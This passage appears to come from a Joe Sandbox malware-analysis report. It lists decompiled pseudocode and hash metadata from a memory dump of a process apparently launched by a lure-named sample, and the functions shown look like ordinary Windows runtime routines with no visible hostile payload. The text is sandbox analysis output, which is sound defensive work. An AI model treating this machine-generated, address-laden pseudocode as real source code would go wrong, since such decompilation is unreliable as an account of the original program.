                                                  										_t64 =  *[fs:0x30];
                                                  										__eflags = _t64[0x240] & 0x00000004;
                                                  										if((_t64[0x240] & 0x00000004) != 0) {
                                                  											_t78 = E017C7D50();
                                                  											__eflags = _t78;
                                                  											if(_t78 == 0) {
                                                  												_t64 = 0x7ffe0385;
                                                  											} else {
                                                  												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                  											}
                                                  											__eflags =  *_t64 & 0x00000020;
                                                  											if(( *_t64 & 0x00000020) != 0) {
                                                  												_t64 = E01827016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  								return _t64;
                                                  							}
                                                  						}
                                                  						_t97 = _t88;
                                                  						_t93 = _t109;
                                                  						E0183FDDA(_t97, _v12);
                                                  						_t105 =  *_t109;
                                                  						_t67 = _v12 + 1;
                                                  						_v12 = _t67;
                                                  						__eflags = _t105 - 0xffffffff;
                                                  						if(_t105 == 0xffffffff) {
                                                  							_t106 = 0;
                                                  							__eflags = 0;
                                                  						} else {
                                                  							_t106 =  *(_t105 + 0x14);
                                                  						}
                                                  						__eflags = _t67 - 2;
                                                  						if(_t67 > 2) {
                                                  							__eflags = _t109 - 0x1895350;
                                                  							if(_t109 != 0x1895350) {
                                                  								__eflags = _t106 - _v20;
                                                  								if(__eflags == 0) {
                                                  									_t93 = _t109;
                                                  									E0183FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                  								}
                                                  							}
                                                  						}
                                                  						_push("RTL: Re-Waiting\n");
                                                  						_push(0);
                                                  						_push(0x65);
                                                  						_v20 = _t106;
                                                  						E01835720();
                                                  						_t104 = _v28;
                                                  						_t116 = _t116 + 0xc;
                                                  						continue;
                                                  					}
                                                  				}
                                                  			}





































                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Re-Waiting
                                                  • API String ID: 0-316354757
                                                  • Opcode ID: f9ede2c91bdead99be04f7b7e06979daba26572f63189a0392ea4503ee66c02a
                                                  • Instruction ID: 3af340d522a7e3ea23999dedcdd3ef0ea535011ae7c9c09c8d2351dfc3d8a7da
                                                  • Opcode Fuzzy Hash: f9ede2c91bdead99be04f7b7e06979daba26572f63189a0392ea4503ee66c02a
                                                  • Instruction Fuzzy Hash: 72612832A046059BDB32DF6CC848B7EF7A0EB85714F58029DD711973C2CB349E848792
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 80%
                                                  			E01870EA5(void* __ecx, void* __edx) {
                                                  				signed int _v20;
                                                  				char _v24;
                                                  				intOrPtr _v28;
                                                  				unsigned int _v32;
                                                  				signed int _v36;
                                                  				intOrPtr _v40;
                                                  				char _v44;
                                                  				intOrPtr _v64;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				signed int _t58;
                                                  				unsigned int _t60;
                                                  				intOrPtr _t62;
                                                  				char* _t67;
                                                  				char* _t69;
                                                  				void* _t80;
                                                  				void* _t83;
                                                  				intOrPtr _t93;
                                                  				intOrPtr _t115;
                                                  				char _t117;
                                                  				void* _t120;
                                                  
                                                  				_t83 = __edx;
                                                  				_t117 = 0;
                                                  				_t120 = __ecx;
                                                  				_v44 = 0;
                                                  				if(E0186FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                  					L24:
                                                  					_t109 = _v44;
                                                  					if(_v44 != 0) {
                                                  						E01871074(_t83, _t120, _t109, _t117, _t117);
                                                  					}
                                                  					L26:
                                                  					return _t117;
                                                  				}
                                                  				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                  				_t5 = _t83 + 1; // 0x1
                                                  				_v36 = _t5 << 0xc;
                                                  				_v40 = _t93;
                                                  				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                  				asm("sbb ebx, ebx");
                                                  				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                  				if(_t58 != 0) {
                                                  					_push(0);
                                                  					_push(0x14);
                                                  					_push( &_v24);
                                                  					_push(3);
                                                  					_push(_t93);
                                                  					_push(0xffffffff);
                                                  					_t80 = E017E9730();
                                                  					_t115 = _v64;
                                                  					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                  						_push(_t93);
                                                  						E0186A80D(_t115, 1, _v20, _t117);
                                                  						_t83 = 4;
                                                  					}
                                                  				}
                                                  				if(E0186A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                  					goto L24;
                                                  				}
                                                  				_t60 = _v32;
                                                  				_t97 = (_t60 != 0x100000) + 1;
                                                  				_t83 = (_v44 -  *0x1898b04 >> 0x14) + (_v44 -  *0x1898b04 >> 0x14);
                                                  				_v28 = (_t60 != 0x100000) + 1;
                                                  				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                  				_v40 = _t62;
                                                  				if(_t83 >= _t62) {
                                                  					L10:
                                                  					asm("lock xadd [eax], ecx");
                                                  					asm("lock xadd [eax], ecx");
                                                  					if(E017C7D50() == 0) {
                                                  						_t67 = 0x7ffe0380;
                                                  					} else {
                                                  						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  					}
                                                  					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                  						E0186138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                  					}
                                                  					if(E017C7D50() == 0) {
                                                  						_t69 = 0x7ffe0388;
                                                  					} else {
                                                  						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                  					}
                                                  					if( *_t69 != 0) {
                                                  						E0185FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                  					}
                                                  					if(( *0x1898724 & 0x00000008) != 0) {
                                                  						E018652F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                  					}
                                                  					_t117 = _v44;
                                                  					goto L26;
                                                  				}
                                                  				while(E018715B5(0x1898ae4, _t83, _t97, _t97) >= 0) {
                                                  					_t97 = _v28;
                                                  					_t83 = _t83 + 2;
                                                  					if(_t83 < _v40) {
                                                  						continue;
                                                  					}
                                                  					goto L10;
                                                  				}
                                                  				goto L24;
                                                  			}

























                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `
                                                  • API String ID: 0-2679148245
                                                  • Opcode ID: e991012b42dfee926f03c1edb1cf907c61c95c5685d86ddd7da107e928d6c65b
                                                  • Instruction ID: 5985b3f61cda4dffb816ec51dbd69074874953d95e56f80dd704a32f8d83fc7b
                                                  • Opcode Fuzzy Hash: e991012b42dfee926f03c1edb1cf907c61c95c5685d86ddd7da107e928d6c65b
                                                  • Instruction Fuzzy Hash: B7518C713043429FE325DF28D888B1BBBE9EBC5704F04092CFA96D7691D671EA45CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 75%
                                                  			E017DF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				char* _v20;
                                                  				intOrPtr _v24;
                                                  				char _v28;
                                                  				intOrPtr _v32;
                                                  				char _v36;
                                                  				char _v44;
                                                  				char _v52;
                                                  				intOrPtr _v56;
                                                  				char _v60;
                                                  				intOrPtr _v72;
                                                  				void* _t51;
                                                  				void* _t58;
                                                  				signed short _t82;
                                                  				short _t84;
                                                  				signed int _t91;
                                                  				signed int _t100;
                                                  				signed short* _t103;
                                                  				void* _t108;
                                                  				intOrPtr* _t109;
                                                  
                                                  				_t103 = __ecx;
                                                  				_t82 = __edx;
                                                  				_t51 = E017C4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                  				if(_t51 >= 0) {
                                                  					_push(0x21);
                                                  					_push(3);
                                                  					_v56 =  *0x7ffe02dc;
                                                  					_v20 =  &_v52;
                                                  					_push( &_v44);
                                                  					_v28 = 0x18;
                                                  					_push( &_v28);
                                                  					_push(0x100020);
                                                  					_v24 = 0;
                                                  					_push( &_v60);
                                                  					_v16 = 0x40;
                                                  					_v12 = 0;
                                                  					_v8 = 0;
                                                  					_t58 = E017E9830();
                                                  					_t87 =  *[fs:0x30];
                                                  					_t108 = _t58;
                                                  					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                  					if(_t108 < 0) {
                                                  						L11:
                                                  						_t51 = _t108;
                                                  					} else {
                                                  						_push(4);
                                                  						_push(8);
                                                  						_push( &_v36);
                                                  						_push( &_v44);
                                                  						_push(_v60);
                                                  						_t108 = E017E9990();
                                                  						if(_t108 < 0) {
                                                  							L10:
                                                  							_push(_v60);
                                                  							E017E95D0();
                                                  							goto L11;
                                                  						} else {
                                                  							_t109 = L017C4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                  							if(_t109 == 0) {
                                                  								_t108 = 0xc0000017;
                                                  								goto L10;
                                                  							} else {
                                                  								_t21 = _t109 + 0x18; // 0x18
                                                  								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                  								 *_t109 = 1;
                                                  								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                  								 *(_t109 + 0xe) = _t82;
                                                  								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                  								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                  								E017EF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                  								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                  								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                  								_t91 =  *_t103 & 0x0000ffff;
                                                  								_t100 = _t91 & 0xfffffffe;
                                                  								_t84 = 0x5c;
                                                  								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                  									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                  										_push(_v60);
                                                  										E017E95D0();
                                                  										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                  										_t51 = 0xc0000106;
                                                  									} else {
                                                  										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                  										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                  										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                  										goto L5;
                                                  									}
                                                  								} else {
                                                  									L5:
                                                  									 *_a4 = _t109;
                                                  									_t51 = 0;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t51;
                                                  			}


























                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                  • Instruction ID: f3b6b212d9d1973919cb08100380ccadc0a47dc0270ed9ae35e08c132ed55ea8
                                                  • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                  • Instruction Fuzzy Hash: 93516A725047159BC320DF29C844A6BFBF8FF88710F00892DFA9697690E7B4E904CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 75%
                                                  			E01823540(intOrPtr _a4) {
                                                  				signed int _v12;
                                                  				intOrPtr _v88;
                                                  				intOrPtr _v92;
                                                  				char _v96;
                                                  				char _v352;
                                                  				char _v1072;
                                                  				intOrPtr _v1140;
                                                  				intOrPtr _v1148;
                                                  				char _v1152;
                                                  				char _v1156;
                                                  				char _v1160;
                                                  				char _v1164;
                                                  				char _v1168;
                                                  				char* _v1172;
                                                  				short _v1174;
                                                  				char _v1176;
                                                  				char _v1180;
                                                  				char _v1192;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				short _t41;
                                                  				short _t42;
                                                  				intOrPtr _t80;
                                                  				intOrPtr _t81;
                                                  				signed int _t82;
                                                  				void* _t83;
                                                  
                                                  				_v12 =  *0x189d360 ^ _t82;
                                                  				_t41 = 0x14;
                                                  				_v1176 = _t41;
                                                  				_t42 = 0x16;
                                                  				_v1174 = _t42;
                                                  				_v1164 = 0x100;
                                                  				_v1172 = L"BinaryHash";
                                                  				_t81 = E017E0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                  				if(_t81 < 0) {
                                                  					L11:
                                                  					_t75 = _t81;
                                                  					E01823706(0, _t81, _t79, _t80);
                                                  					L12:
                                                  					if(_a4 != 0xc000047f) {
                                                  						E017EFA60( &_v1152, 0, 0x50);
                                                  						_v1152 = 0x60c201e;
                                                  						_v1148 = 1;
                                                  						_v1140 = E01823540;
                                                  						E017EFA60( &_v1072, 0, 0x2cc);
                                                  						_push( &_v1072);
                                                  						E017FDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                  						E01830C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                  						_push(_v1152);
                                                  						_push(0xffffffff);
                                                  						E017E97C0();
                                                  					}
                                                  					return E017EB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                  				}
                                                  				_t79 =  &_v352;
                                                  				_t81 = E01823971(0, _a4,  &_v352,  &_v1156);
                                                  				if(_t81 < 0) {
                                                  					goto L11;
                                                  				}
                                                  				_t75 = _v1156;
                                                  				_t79 =  &_v1160;
                                                  				_t81 = E01823884(_v1156,  &_v1160,  &_v1168);
                                                  				if(_t81 >= 0) {
                                                  					_t80 = _v1160;
                                                  					E017EFA60( &_v96, 0, 0x50);
                                                  					_t83 = _t83 + 0xc;
                                                  					_push( &_v1180);
                                                  					_push(0x50);
                                                  					_push( &_v96);
                                                  					_push(2);
                                                  					_push( &_v1176);
                                                  					_push(_v1156);
                                                  					_t81 = E017E9650();
                                                  					if(_t81 >= 0) {
                                                  						if(_v92 != 3 || _v88 == 0) {
                                                  							_t81 = 0xc000090b;
                                                  						}
                                                  						if(_t81 >= 0) {
                                                  							_t75 = _a4;
                                                  							_t79 =  &_v352;
                                                  							E01823787(_a4,  &_v352, _t80);
                                                  						}
                                                  					}
                                                  					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                  				}
                                                  				_push(_v1156);
                                                  				E017E95D0();
                                                  				if(_t81 >= 0) {
                                                  					goto L12;
                                                  				} else {
                                                  					goto L11;
                                                  				}
                                                  			}

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryHash
                                                  • API String ID: 0-2202222882
                                                  • Opcode ID: c3da96c8cbe018e70c71837f9f771a5419d2dcca7b31338ae2f469b86fdc1288
                                                  • Instruction ID: 6e81199075f850ea0a6526243506dd06aae851c6b65760cf5b778ba678792c9d
                                                  • Opcode Fuzzy Hash: c3da96c8cbe018e70c71837f9f771a5419d2dcca7b31338ae2f469b86fdc1288
                                                  • Instruction Fuzzy Hash: DD4143F2D0052DABDF219A54CC94F9EB7BCAB48714F0045A5EB09AB241DB349F888F95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 71%
                                                  			E018705AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                  				signed int _v20;
                                                  				char _v24;
                                                  				signed int _v28;
                                                  				char _v32;
                                                  				signed int _v36;
                                                  				intOrPtr _v40;
                                                  				void* __ebx;
                                                  				void* _t35;
                                                  				signed int _t42;
                                                  				char* _t48;
                                                  				signed int _t59;
                                                  				signed char _t61;
                                                  				signed int* _t79;
                                                  				void* _t88;
                                                  
                                                  				_v28 = __edx;
                                                  				_t79 = __ecx;
                                                  				if(E018707DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                  					L13:
                                                  					_t35 = 0;
                                                  					L14:
                                                  					return _t35;
                                                  				}
                                                  				_t61 = __ecx[1];
                                                  				_t59 = __ecx[0xf];
                                                  				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                  				_v36 = _a8 << 0xc;
                                                  				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                  				asm("sbb esi, esi");
                                                  				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                  				if(_t42 != 0) {
                                                  					_push(0);
                                                  					_push(0x14);
                                                  					_push( &_v24);
                                                  					_push(3);
                                                  					_push(_t59);
                                                  					_push(0xffffffff);
                                                  					if(E017E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                  						_push(_t61);
                                                  						E0186A80D(_t59, 1, _v20, 0);
                                                  						_t88 = 4;
                                                  					}
                                                  				}
                                                  				_t35 = E0186A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                  				if(_t35 < 0) {
                                                  					goto L14;
                                                  				}
                                                  				E01871293(_t79, _v40, E018707DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                  				if(E017C7D50() == 0) {
                                                  					_t48 = 0x7ffe0380;
                                                  				} else {
                                                  					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  				}
                                                  				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                  					E0186138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                  				}
                                                  				goto L13;
                                                  			}

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `
                                                  • API String ID: 0-2679148245
                                                  • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                  • Instruction ID: 941d4f242ee1399ef3401c2b0eaf3c48a1d8dcafa5acbacea55ff4d3b9249923
                                                  • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                  • Instruction Fuzzy Hash: 2431E47260434A6BE710DE28CD85F97BBD9EBC5754F144229FA54EB280D770EA04CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E01823884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                  				char _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr* _v16;
                                                  				char* _v20;
                                                  				short _v22;
                                                  				char _v24;
                                                  				intOrPtr _t38;
                                                  				short _t40;
                                                  				short _t41;
                                                  				void* _t44;
                                                  				intOrPtr _t47;
                                                  				void* _t48;
                                                  
                                                  				_v16 = __edx;
                                                  				_t40 = 0x14;
                                                  				_v24 = _t40;
                                                  				_t41 = 0x16;
                                                  				_v22 = _t41;
                                                  				_t38 = 0;
                                                  				_v12 = __ecx;
                                                  				_push( &_v8);
                                                  				_push(0);
                                                  				_push(0);
                                                  				_push(2);
                                                  				_t43 =  &_v24;
                                                  				_v20 = L"BinaryName";
                                                  				_push( &_v24);
                                                  				_push(__ecx);
                                                  				_t47 = 0;
                                                  				_t48 = E017E9650();
                                                  				if(_t48 >= 0) {
                                                  					_t48 = 0xc000090b;
                                                  				}
                                                  				if(_t48 != 0xc0000023) {
                                                  					_t44 = 0;
                                                  					L13:
                                                  					if(_t48 < 0) {
                                                  						L16:
                                                  						if(_t47 != 0) {
                                                  							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                  						}
                                                  						L18:
                                                  						return _t48;
                                                  					}
                                                  					 *_v16 = _t38;
                                                  					 *_a4 = _t47;
                                                  					goto L18;
                                                  				}
                                                  				_t47 = L017C4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                  				if(_t47 != 0) {
                                                  					_push( &_v8);
                                                  					_push(_v8);
                                                  					_push(_t47);
                                                  					_push(2);
                                                  					_push( &_v24);
                                                  					_push(_v12);
                                                  					_t48 = E017E9650();
                                                  					if(_t48 < 0) {
                                                  						_t44 = 0;
                                                  						goto L16;
                                                  					}
                                                  					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                  						_t48 = 0xc000090b;
                                                  					}
                                                  					_t44 = 0;
                                                  					if(_t48 < 0) {
                                                  						goto L16;
                                                  					} else {
                                                  						_t17 = _t47 + 0xc; // 0xc
                                                  						_t38 = _t17;
                                                  						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                  							_t48 = 0xc000090b;
                                                  						}
                                                  						goto L13;
                                                  					}
                                                  				}
                                                  				_t48 = _t48 + 0xfffffff4;
                                                  				goto L18;
                                                  			}

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryName
                                                  • API String ID: 0-215506332
                                                  • Opcode ID: 4d96ae4c3f6554297da9ea31e5a8273b1629eafa91d33c0936581bb79cb07b4f
                                                  • Instruction ID: b451cf941f63bd8dad3c1e4a7a05a8f0148d930d5bd2b4dc68d66adfdfd9c67f
                                                  • Opcode Fuzzy Hash: 4d96ae4c3f6554297da9ea31e5a8273b1629eafa91d33c0936581bb79cb07b4f
                                                  • Instruction Fuzzy Hash: 9D310872A0052ABFDB16DA58C955D7BF7B4FB4AB20F014129ED04E7241D7349F40CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 33%
                                                  			E017DD294(void* __ecx, char __edx, void* __eflags) {
                                                  				signed int _v8;
                                                  				char _v52;
                                                  				signed int _v56;
                                                  				signed int _v60;
                                                  				intOrPtr _v64;
                                                  				char* _v68;
                                                  				intOrPtr _v72;
                                                  				char _v76;
                                                  				signed int _v84;
                                                  				intOrPtr _v88;
                                                  				char _v92;
                                                  				intOrPtr _v96;
                                                  				intOrPtr _v100;
                                                  				char _v104;
                                                  				char _v105;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t35;
                                                  				char _t38;
                                                  				signed int _t40;
                                                  				signed int _t44;
                                                  				signed int _t52;
                                                  				void* _t53;
                                                  				void* _t55;
                                                  				void* _t61;
                                                  				intOrPtr _t62;
                                                  				void* _t64;
                                                  				signed int _t65;
                                                  				signed int _t66;
                                                  
                                                  				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                  				_v8 =  *0x189d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                  				_v105 = __edx;
                                                  				_push( &_v92);
                                                  				_t52 = 0;
                                                  				_push(0);
                                                  				_push(0);
                                                  				_push( &_v104);
                                                  				_push(0);
                                                  				_t59 = __ecx;
                                                  				_t55 = 2;
                                                  				if(E017C4120(_t55, __ecx) < 0) {
                                                  					_t35 = 0;
                                                  					L8:
                                                  					_pop(_t61);
                                                  					_pop(_t64);
                                                  					_pop(_t53);
                                                  					return E017EB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                  				}
                                                  				_v96 = _v100;
                                                  				_t38 = _v92;
                                                  				if(_t38 != 0) {
                                                  					_v104 = _t38;
                                                  					_v100 = _v88;
                                                  					_t40 = _v84;
                                                  				} else {
                                                  					_t40 = 0;
                                                  				}
                                                  				_v72 = _t40;
                                                  				_v68 =  &_v104;
                                                  				_push( &_v52);
                                                  				_v76 = 0x18;
                                                  				_push( &_v76);
                                                  				_v64 = 0x40;
                                                  				_v60 = _t52;
                                                  				_v56 = _t52;
                                                  				_t44 = E017E98D0();
                                                  				_t62 = _v88;
                                                  				_t65 = _t44;
                                                  				if(_t62 != 0) {
                                                  					asm("lock xadd [edi], eax");
                                                  					if((_t44 | 0xffffffff) != 0) {
                                                  						goto L4;
                                                  					}
                                                  					_push( *((intOrPtr*)(_t62 + 4)));
                                                  					E017E95D0();
                                                  					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                  					goto L4;
                                                  				} else {
                                                  					L4:
                                                  					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                  					if(_t65 >= 0) {
                                                  						_t52 = 1;
                                                  					} else {
                                                  						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                  							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                  						}
                                                  					}
                                                  					_t35 = _t52;
                                                  					goto L8;
                                                  				}
                                                  			}


































                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: c1dcc62d6337c57248563ae3acb777ea3408521d82d8b92b197b04e6e96c677e
                                                  • Instruction ID: 8889d0720fbd45151f6c55a0c3ac8631bd64ed1999f8798abd504b8b0f0bdde8
                                                  • Opcode Fuzzy Hash: c1dcc62d6337c57248563ae3acb777ea3408521d82d8b92b197b04e6e96c677e
                                                  • Instruction Fuzzy Hash: C23193B2508309DFC721DF68C98495BFBF8EB99754F40092EF99583290DA34DD04CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E017B1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                  				intOrPtr _v8;
                                                  				char _v16;
                                                  				intOrPtr* _t26;
                                                  				intOrPtr _t29;
                                                  				void* _t30;
                                                  				signed int _t31;
                                                  
                                                  				_t27 = __ecx;
                                                  				_t29 = __edx;
                                                  				_t31 = 0;
                                                  				_v8 = __edx;
                                                  				if(__edx == 0) {
                                                  					L18:
                                                  					_t30 = 0xc000000d;
                                                  					goto L12;
                                                  				} else {
                                                  					_t26 = _a4;
                                                  					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                  						goto L18;
                                                  					} else {
                                                  						E017EBB40(__ecx,  &_v16, __ecx);
                                                  						_push(_t26);
                                                  						_push(0);
                                                  						_push(0);
                                                  						_push(_t29);
                                                  						_push( &_v16);
                                                  						_t30 = E017EA9B0();
                                                  						if(_t30 >= 0) {
                                                  							_t19 =  *_t26;
                                                  							if( *_t26 != 0) {
                                                  								goto L7;
                                                  							} else {
                                                  								 *_a8 =  *_a8 & 0;
                                                  							}
                                                  						} else {
